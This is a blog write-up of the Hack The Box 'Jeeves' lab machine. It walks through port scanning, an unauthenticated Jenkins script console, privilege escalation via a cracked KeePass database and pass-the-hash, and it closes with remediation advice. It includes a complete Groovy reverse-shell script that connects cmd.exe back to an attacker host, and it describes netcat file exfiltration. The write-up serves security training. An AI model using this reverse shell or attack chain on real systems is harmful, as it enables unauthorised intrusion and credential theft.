Michael Thelen

NinjaCat - Security Analyst - Cyber Security Enthusiast

18 Jun 2018

Hack The Box Write-Up Jeeves

Estimated read time: ~5 minutes

Hack The Box is an online platform that hosts virtual machines that are vulnerable by design to sharpen one’s penetration testing and security skills. While Jeeves is not a very complex machine to compromise, gaining administrative access still requires several offensive techniques that offer an interesting learning experience.

Tools Used

  • Nmap
  • Firefox browser
  • Gobuster
  • Ncat and Netcat
  • Basic Groovy scripting
  • Basic PowerShell commands
  • John the Ripper
  • KeepassXC
  • Pth-Winexe

Enumeration: Nmap

Running an initial scan with Nmap reveals that ports 80, 135, 445 and 50000 are open. “Nmap Initial Scan”

Running a targeted scan against ports 80, 135, 445 and 50000 with Nmap’s default and service enumeration scripts reveals a Microsoft IIS 10 web server and the Microsoft RPC and SMB services. At this point it is fairly certain that Jeeves is a Windows machine.

Port 50000 with the service banner Jetty 9.4.z-SNAPSHOT stands out immediately from the other services, as this is not a standard service bundled with the Windows operating system. “Nmap Service Scan”

Enumeration: Firefox

A quick Google search leads to a Wikipedia article and reveals that Jetty is a Java web server. A visit to the website on port 50000 with the Firefox browser results in a 404 error page. “Jetty 404 Error”

Enumeration: Gobuster

Digging a bit deeper, a Gobuster scan reveals the askjeeves directory. “Gobuster Scan Askjeeves Directory”

Enumeration: Firefox Continued

Investigating the askjeeves directory reveals a Jenkins installation that exposes administrative functionality without the need to authenticate. “Jenkins Installation”

Browsing around on the Jenkins website reveals a script console. “Jenkins Script Console”

Exploitation: Initial Shell

Further investigation of the Jenkins script console reveals that it is possible to run Groovy scripts. This functionality can be leveraged to execute code on the machine. “Groovy Script Console”

An Ncat listener is prepared on port 443 to catch the connection. “Preparing Ncat Listener on Port 443”

Initiating a connection with the script console to the listener on port 443 is trivial and can be achieved with the following Groovy script.

    // attacking machine and listener port
    String host="10.10.14.4";
    int port=443;
    String cmd="cmd.exe";
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s=new Socket(host,port);
    InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
    OutputStream po=p.getOutputStream(),so=s.getOutputStream();
    // relay process output to the socket and socket input to the process until either side closes
    while(!s.isClosed()){
        while(pi.available()>0)so.write(pi.read());
        while(pe.available()>0)so.write(pe.read());
        while(si.available()>0)po.write(si.read());
        so.flush();po.flush();
        Thread.sleep(50);
        try{p.exitValue();break;}catch(Exception e){}
    };
    p.destroy();s.close();

The Groovy reverse shell connects back to the attacking machine and provides a foothold as the low-privileged Kohsuke user. “Groovy Initial Reverse Shell”

Privilege Escalation

Browsing through the documents folder of the Kohsuke user reveals a CEH.kdbx Keepass database. There is a possibility this Keepass database contains information to expand influence or elevate privileges, so spending some time transferring the database to the attacking machine and cracking it can be a good investment. “CEH.kdbx in User Directory”

Netcat can be leveraged to transfer the CEH.kdbx file from Jeeves to the attacking machine. First, nc.exe has to be transferred to Jeeves, which is trivial with the Python Simple HTTP server module and a little bit of PowerShell knowledge. “Preparing Python Simple HTTP Server”

PowerShell is installed on Windows by default and can be leveraged to download the nc.exe file from the web server that is listening on port 8000. “Download nc.exe With PowerShell”

An Ncat listener is prepared on the attacking machine to receive the file transfer. “Ncat Listener for CEH.kdbx transfer”

The CEH.kdbx file transfer is initiated with Netcat from the Jeeves machine. “Transfer CEH.kdbx to Attacker”

Ncat on the attacking machine receives the connection and the CEH.kdbx file transfer. “Receiving the CEH.kdbx File”

Now that the Keepass database is available on the attacking machine an attempt can be made to crack the password hash to gain access to the data stored within the database.

The password hash can be extracted with keepass2john. After the hash is extracted it can be cracked with John the Ripper and the well-known rockyou password list. It does not take long before the password is found. “Cracking the CEH.kdbx Password”

Now that the password of the Keepass database is found, KeepassXC can be used to open the file and inspect its contents. Several entries are present, but a Windows NTLM hash stands out among all other entries. “Windows NTLM Hash”

Exploitation: Administrator

Windows NTLM hashes can be used in a well-known attack called Pass the Hash. To gain a command line shell on the Jeeves machine the pth-winexe command line utility can be used. Launching the Pass the Hash attack with the discovered hash spawns a command line shell as the Administrator user. “Pass the Hash Attack”

Exposing the Root Flag

At this point the Jeeves machine is fully compromised and in a real-world engagement it is game over; however, to complete the Hack The Box challenge the root.txt flag needs to be obtained as well.

The creator of the challenge cleverly hid the root.txt flag within an alternate data stream, which can be discovered with the dir /R command. Using the more command, the alternate data stream can be read, revealing the root.txt flag. “Getting the Root Flag”

Remediation

The Jenkins installation on port 50000 exposed administrative functionality without requiring authentication, which is an example of broken access control. This configuration error allowed any user with access to the Jenkins website to reach administrative functionality that could be leveraged to execute code.

The use of a weak password for the Keepass database made it trivial to crack. This in turn resulted in the disclosure of sensitive information that was used to elevate privileges resulting in the full compromise of the Jeeves machine.

The following configuration and policy changes should be considered to mitigate risk.

  • Enforce encrypted communication for the askjeeves directory on the web server
  • Protect access to administrative functionality on the Jenkins installation with proper authentication and authorization
  • Implement strong password policy guidelines and enforce those guidelines where possible
  • Inform users about the importance of strong passwords, train them in creating strong but easy-to-remember passwords and in storing passwords securely